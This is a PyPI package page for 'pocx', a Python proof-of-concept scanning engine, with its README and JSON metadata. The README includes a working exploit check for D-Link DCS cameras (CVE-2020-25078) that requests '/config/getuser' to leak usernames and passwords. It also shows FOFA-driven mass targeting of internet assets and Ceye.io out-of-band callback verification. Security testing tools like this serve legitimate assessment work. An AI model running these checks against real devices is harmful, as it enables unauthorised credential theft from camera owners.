pocx


Namepocx JSON
Version 0.2.3 PyPI version JSON
download
home_pagehttps://github.com/antx-code/pocx
SummaryA Simple, Fast and Powerful poc engine tools was built by antx, which support synchronous mode and asynchronous mode.
upload_time2023-07-04 02:20:34
maintainer
docs_urlNone
authorantx
requires_python>=3.8,<4.0
licenseMIT
keywords async poc engine pocx
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage
            # pocx
A Simple, Fast and Powerful poc engine tools was built by antx, which support synchronous mode and asynchronous mode.

## Description
pocx is a simple, fast and powerful poc engine tools, which support synchronous mode and asynchronous mode. pocx also 
support some useful features, which like fofa search and parse assets to verify. You also can use smart method to verify 
some special assets by using ceyeio, which it is cannot return or display the result. 

## Install

```bash
pip3 install pocx
```

## Usage

### POC Template

```python
# Title: xxxxxxx
# Author: antx
# Email: 7877940+antx-code@users.noreply.github.com
# CVE: CVE-xxxx-xxxxx

from pocx import BasicPoc, AioPoc


class POC(BasicPoc):
    def __init__(self):
        self.name = 'poc'
        super(POC, self).__init__()

    def poc(self, target):
        """
        
        your poc code here.
        
        """
        return


if __name__ == '__main__':
    target = 'http://127.0.0.1'
    cve = POC()
    cve.run(target)
```

### Synchronous Mode Example

```python
# Title: D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078
# Author: antx
# Email: 7877940+antx-code@users.noreply.github.com
# CVE: CVE-2020-25078

from pocx import BasicPoc
from loguru import logger


class DLinkPoc(BasicPoc):
    @logger.catch(level='ERROR')
    def __init__(self):
        self.name = 'D_Link-DCS-2530L'
        super(DLinkPoc, self).__init__()

    @logger.catch(level='ERROR')
    def poc(self, target: str):
        poc_url = '/config/getuser?index=0'
        try:
            resp = self.get(target + poc_url)
            if resp.status_code == 200 and 'name=' in resp.text and 'pass=' in resp.text and 'priv=' in resp.text:
                logger.success(resp.text)
            elif resp.status_code == 500:
                logger.error(f'[-] {target} {resp.status_code}')
        except Exception as e:
            logger.error(f'[-] {target} {e}')


if __name__ == '__main__':
    target = 'http://127.0.0.1'
    cve = DLinkPoc()
    cve.run(target)
```

### Asynchronous Mode Example

```python
# Title: D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078
# Author: antx
# Email: 7877940+antx-code@users.noreply.github.com
# CVE: CVE-2020-25078

from pocx import AioPoc
from loguru import logger


class DLinkPoc(AioPoc):
    @logger.catch(level='ERROR')
    def __init__(self):
        self.name = 'D_Link-DCS-2530L'
        super(DLinkPoc, self).__init__()

    @logger.catch(level='ERROR')
    async def poc(self, target: str):
        poc_url = '/config/getuser?index=0'
        try:
            resp = await self.aio_get(target + poc_url)
            if resp.status_code == 200 and 'name=' in resp.text and 'pass=' in resp.text and 'priv=' in resp.text:
                logger.success(resp.text)
            elif resp.status_code == 500:
                logger.error(f'[-] {target} {resp.status_code}')
        except Exception as e:
            logger.error(f'[-] {target} {e}')


if __name__ == '__main__':
    target = 'http://127.0.0.1'
    cve = DLinkPoc()
    cve.run(target)
```

### Useful Functions

#### FoFa

```python
# Title: xxxxxxx
# Author: antx
# Email: 7877940+antx-code@users.noreply.github.com
# CVE: CVE-xxxx-xxxxx

from pocx import BasicPoc, AioPoc
from pocx.funcs import Fofa


class POC(BasicPoc):
    def __init__(self):
        self.name = 'poc'
        super(POC, self).__init__()

    def poc(self, target):
        """
        
        your poc code here.
        
        """
        return


if __name__ == '__main__':
    grammar = 'app="xxxxxx"'
    cve = POC()
    fofa = Fofa()
    fofa.set_config(api_key='xxxxxx', api_email='xxxxxx')
    print(f'[+] the asset account of grammar: {grammar} are: {fofa.asset_counts(grammar)}')
    pages = fofa.asset_pages(grammar)
    for page in range(1, pages + 1):
        print(f'[*] page {page}')
        assets = fofa.assets(grammar, page)
        cve.run(assets)
```

#### Ceye

```python
# Title: xxxxxxx
# Author: antx
# Email: 7877940+antx-code@users.noreply.github.com
# CVE: CVE-xxxx-xxxxx

from pocx import BasicPoc, AioPoc
from pocx.funcs import Ceye


class POC(BasicPoc):
    def __init__(self):
        self.name = 'poc'
        super(POC, self).__init__()
        self.ceyeio = Ceye()
        
    def poc(self, target):
        pid = self.ceyeio.generate_payload_id()
        self.ceyeio.set_config(api_token='xxxxxx', identifier='xxxxxx.ceye.io')
    
        """
        
        your poc code here.
        
        """
        
        self.ceyeio.verify(pid, 'dns')
        return
```

#### Proxy

```python
# Title: xxxxxxx
# Author: antx
# Email: 7877940+antx-code@users.noreply.github.com
# CVE: CVE-xxxx-xxxxx

from pocx import BasicPoc, AioPoc
from pocx.funcs import Ceye


class POC(BasicPoc):
    def __init__(self):
        self.name = 'poc'
        super(POC, self).__init__()
        self.ceyeio = Ceye()

    def poc(self, target):
        pid = self.ceyeio.generate_payload_id()
        self.ceyeio.set_config(api_token='xxxxxx', identifier='xxxxxx.ceye.io')
        self.set_headers({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, '
                                        'like Gecko) Chrome/87.0.4280.88 Safari/537.36'})
        proxy = {
            'all://': 'http://127.0.0.1:7890',
        }
        
        """
        
        or use httpx support proxy:
        proxy = {
            'http://': 'http://127.0.0.1:7890',
            'https://': 'https://127.0.0.1:7890',
            }
        
        """
        
        self.set_proxies(proxy)

        """
        
        your poc code here.
        
        """

        self.ceyeio.verify(pid, 'dns')
        return
    

if __name__ == '__main__':
    target = 'http://127.0.0.1:8888'
    cve = POC()
    cve.run(target)
```

            

Raw data

            {
    "_id": null,
    "home_page": "https://github.com/antx-code/pocx",
    "name": "pocx",
    "maintainer": "",
    "docs_url": null,
    "requires_python": ">=3.8,<4.0",
    "maintainer_email": "",
    "keywords": "async,poc,engine,pocx",
    "author": "antx",
    "author_email": "wkaifeng2007@163.com",
    "download_url": "https://files.pythonhosted.org/packages/3a/db/153d1f2a1402611472d5f59322253e723da435346c4a2a406a3d2be3e1b3/pocx-0.2.3.tar.gz",
    "platform": null,
    "description": "# pocx\nA Simple, Fast and Powerful poc engine tools was built by antx, which support synchronous mode and asynchronous mode.\n\n## Description\npocx is a simple, fast and powerful poc engine tools, which support synchronous mode and asynchronous mode. pocx also \nsupport some useful features, which like fofa search and parse assets to verify. You also can use smart method to verify \nsome special assets by using ceyeio, which it is cannot return or display the result. \n\n## Install\n\n```bash\npip3 install pocx\n```\n\n## Usage\n\n### POC Template\n\n```python\n# Title: xxxxxxx\n# Author: antx\n# Email: 7877940+antx-code@users.noreply.github.com\n# CVE: CVE-xxxx-xxxxx\n\nfrom pocx import BasicPoc, AioPoc\n\n\nclass POC(BasicPoc):\n    def __init__(self):\n        self.name = 'poc'\n        super(POC, self).__init__()\n\n    def poc(self, target):\n        \"\"\"\n        \n        your poc code here.\n        \n        \"\"\"\n        return\n\n\nif __name__ == '__main__':\n    target = 'http://127.0.0.1'\n    cve = POC()\n    cve.run(target)\n```\n\n### Synchronous Mode Example\n\n```python\n# Title: D-Link DCS\u7cfb\u5217\u76d1\u63a7 \u8d26\u53f7\u5bc6\u7801\u4fe1\u606f\u6cc4\u9732 CVE-2020-25078\n# Author: antx\n# Email: 7877940+antx-code@users.noreply.github.com\n# CVE: CVE-2020-25078\n\nfrom pocx import BasicPoc\nfrom loguru import logger\n\n\nclass DLinkPoc(BasicPoc):\n    @logger.catch(level='ERROR')\n    def __init__(self):\n        self.name = 'D_Link-DCS-2530L'\n        super(DLinkPoc, self).__init__()\n\n    @logger.catch(level='ERROR')\n    def poc(self, target: str):\n        poc_url = '/config/getuser?index=0'\n        try:\n            resp = self.get(target + poc_url)\n            if resp.status_code == 200 and 'name=' in resp.text and 'pass=' in resp.text and 'priv=' in resp.text:\n                logger.success(resp.text)\n            elif resp.status_code == 500:\n                logger.error(f'[-] {target} {resp.status_code}')\n        except Exception as e:\n            logger.error(f'[-] {target} {e}')\n\n\nif __name__ == '__main__':\n    target = 'http://127.0.0.1'\n    cve = DLinkPoc()\n    cve.run(target)\n```\n\n### Asynchronous Mode Example\n\n```python\n# Title: D-Link DCS\u7cfb\u5217\u76d1\u63a7 \u8d26\u53f7\u5bc6\u7801\u4fe1\u606f\u6cc4\u9732 CVE-2020-25078\n# Author: antx\n# Email: 7877940+antx-code@users.noreply.github.com\n# CVE: CVE-2020-25078\n\nfrom pocx import AioPoc\nfrom loguru import logger\n\n\nclass DLinkPoc(AioPoc):\n    @logger.catch(level='ERROR')\n    def __init__(self):\n        self.name = 'D_Link-DCS-2530L'\n        super(DLinkPoc, self).__init__()\n\n    @logger.catch(level='ERROR')\n    async def poc(self, target: str):\n        poc_url = '/config/getuser?index=0'\n        try:\n            resp = await self.aio_get(target + poc_url)\n            if resp.status_code == 200 and 'name=' in resp.text and 'pass=' in resp.text and 'priv=' in resp.text:\n                logger.success(resp.text)\n            elif resp.status_code == 500:\n                logger.error(f'[-] {target} {resp.status_code}')\n        except Exception as e:\n            logger.error(f'[-] {target} {e}')\n\n\nif __name__ == '__main__':\n    target = 'http://127.0.0.1'\n    cve = DLinkPoc()\n    cve.run(target)\n```\n\n### Useful Functions\n\n#### FoFa\n\n```python\n# Title: xxxxxxx\n# Author: antx\n# Email: 7877940+antx-code@users.noreply.github.com\n# CVE: CVE-xxxx-xxxxx\n\nfrom pocx import BasicPoc, AioPoc\nfrom pocx.funcs import Fofa\n\n\nclass POC(BasicPoc):\n    def __init__(self):\n        self.name = 'poc'\n        super(POC, self).__init__()\n\n    def poc(self, target):\n        \"\"\"\n        \n        your poc code here.\n        \n        \"\"\"\n        return\n\n\nif __name__ == '__main__':\n    grammar = 'app=\"xxxxxx\"'\n    cve = POC()\n    fofa = Fofa()\n    fofa.set_config(api_key='xxxxxx', api_email='xxxxxx')\n    print(f'[+] the asset account of grammar: {grammar} are: {fofa.asset_counts(grammar)}')\n    pages = fofa.asset_pages(grammar)\n    for page in range(1, pages + 1):\n        print(f'[*] page {page}')\n        assets = fofa.assets(grammar, page)\n        cve.run(assets)\n```\n\n#### Ceye\n\n```python\n# Title: xxxxxxx\n# Author: antx\n# Email: 7877940+antx-code@users.noreply.github.com\n# CVE: CVE-xxxx-xxxxx\n\nfrom pocx import BasicPoc, AioPoc\nfrom pocx.funcs import Ceye\n\n\nclass POC(BasicPoc):\n    def __init__(self):\n        self.name = 'poc'\n        super(POC, self).__init__()\n        self.ceyeio = Ceye()\n        \n    def poc(self, target):\n        pid = self.ceyeio.generate_payload_id()\n        self.ceyeio.set_config(api_token='xxxxxx', identifier='xxxxxx.ceye.io')\n    \n        \"\"\"\n        \n        your poc code here.\n        \n        \"\"\"\n        \n        self.ceyeio.verify(pid, 'dns')\n        return\n```\n\n#### Proxy\n\n```python\n# Title: xxxxxxx\n# Author: antx\n# Email: 7877940+antx-code@users.noreply.github.com\n# CVE: CVE-xxxx-xxxxx\n\nfrom pocx import BasicPoc, AioPoc\nfrom pocx.funcs import Ceye\n\n\nclass POC(BasicPoc):\n    def __init__(self):\n        self.name = 'poc'\n        super(POC, self).__init__()\n        self.ceyeio = Ceye()\n\n    def poc(self, target):\n        pid = self.ceyeio.generate_payload_id()\n        self.ceyeio.set_config(api_token='xxxxxx', identifier='xxxxxx.ceye.io')\n        self.set_headers({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, '\n                                        'like Gecko) Chrome/87.0.4280.88 Safari/537.36'})\n        proxy = {\n            'all://': 'http://127.0.0.1:7890',\n        }\n        \n        \"\"\"\n        \n        or use httpx support proxy:\n        proxy = {\n            'http://': 'http://127.0.0.1:7890',\n            'https://': 'https://127.0.0.1:7890',\n            }\n        \n        \"\"\"\n        \n        self.set_proxies(proxy)\n\n        \"\"\"\n        \n        your poc code here.\n        \n        \"\"\"\n\n        self.ceyeio.verify(pid, 'dns')\n        return\n    \n\nif __name__ == '__main__':\n    target = 'http://127.0.0.1:8888'\n    cve = POC()\n    cve.run(target)\n```\n",
    "bugtrack_url": null,
    "license": "MIT",
    "summary": "A Simple, Fast and Powerful poc engine tools was built by antx, which support synchronous mode and asynchronous mode.",
    "version": "0.2.3",
    "project_urls": {
        "Homepage": "https://github.com/antx-code/pocx",
        "Repository": "https://github.com/antx-code/pocx"
    },
    "split_keywords": [
        "async",
        "poc",
        "engine",
        "pocx"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "dcb452e800de49e7dc17f04572a14e421d17bebe1eca2372e76fb8d8f9c4c744",
                "md5": "66021e2feefeb61b775fe6393f4baece",
                "sha256": "fc1413daa854328307d7285a1504c5e9948eca89888b97dc8e355080fd1b959a"
            },
            "downloads": -1,
            "filename": "pocx-0.2.3-py3-none-any.whl",
            "has_sig": false,
            "md5_digest": "66021e2feefeb61b775fe6393f4baece",
            "packagetype": "bdist_wheel",
            "python_version": "py3",
            "requires_python": ">=3.8,<4.0",
            "size": 9160,
            "upload_time": "2023-07-04T02:20:32",
            "upload_time_iso_8601": "2023-07-04T02:20:32.231673Z",
            "url": "https://files.pythonhosted.org/packages/dc/b4/52e800de49e7dc17f04572a14e421d17bebe1eca2372e76fb8d8f9c4c744/pocx-0.2.3-py3-none-any.whl",
            "yanked": false,
            "yanked_reason": null
        },
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "3adb153d1f2a1402611472d5f59322253e723da435346c4a2a406a3d2be3e1b3",
                "md5": "65e25cafc9f8e3c90d5bbd683f52a186",
                "sha256": "cd2e16df60e66f26fceab782e871674ff6efe94c2b250054a16c4e0e00b77764"
            },
            "downloads": -1,
            "filename": "pocx-0.2.3.tar.gz",
            "has_sig": false,
            "md5_digest": "65e25cafc9f8e3c90d5bbd683f52a186",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": ">=3.8,<4.0",
            "size": 7633,
            "upload_time": "2023-07-04T02:20:34",
            "upload_time_iso_8601": "2023-07-04T02:20:34.357589Z",
            "url": "https://files.pythonhosted.org/packages/3a/db/153d1f2a1402611472d5f59322253e723da435346c4a2a406a3d2be3e1b3/pocx-0.2.3.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2023-07-04 02:20:34",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "github_user": "antx-code",
    "github_project": "pocx",
    "travis_ci": false,
    "coveralls": true,
    "github_actions": false,
    "lcname": "pocx"
}
        
Elapsed time: 2.64755s